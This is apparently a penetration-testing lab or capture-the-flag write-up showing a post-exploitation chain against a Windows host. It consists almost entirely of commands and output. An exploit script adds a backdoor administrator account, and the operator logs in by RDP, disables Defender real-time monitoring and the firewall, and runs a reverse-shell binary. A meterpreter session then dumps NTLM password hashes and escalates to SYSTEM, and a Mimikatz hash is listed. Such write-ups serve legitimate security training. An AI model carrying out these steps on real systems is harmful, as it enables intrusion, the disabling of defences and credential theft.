Using the Exploit to add a new user
proxychains python3 manage.py -u admin -t http://172.16.1.30 -p Zaq12wsx! -c "net user /add ipsec TryHarder.1234"
proxychains python3 manage.py -u admin -t http://172.16.1.30 -p Zaq12wsx! -c "net localgroup administrators ipsec /add"
proxychains xfreerdp /u:ipsec /v:172.16.1.30 /p: TryHarder.1234
On the windows system
Finding the flag and loot for ned.flanders_adm (domain user)
whoami /groups
cmd>powershell.exe Start-Process cmd.exe -Verb runAs
#it gives us High mandatory Level
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
cmd> netsh advfirewall set allprofiles state off
cmd> netsh advfirewall set currentprofile state off
.\revers.exe
Now on meterpreter
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1002:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
justalocaladmin:1001:aad3b435b51404eeaad3b435b51404ee:de3fc4311cd523e83700640cb95b303b:::
Getting the System
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Mimikatz
NTLM b0008678126a9a7143961c96161725a4
#extra hash from sekurlsa::logonpassword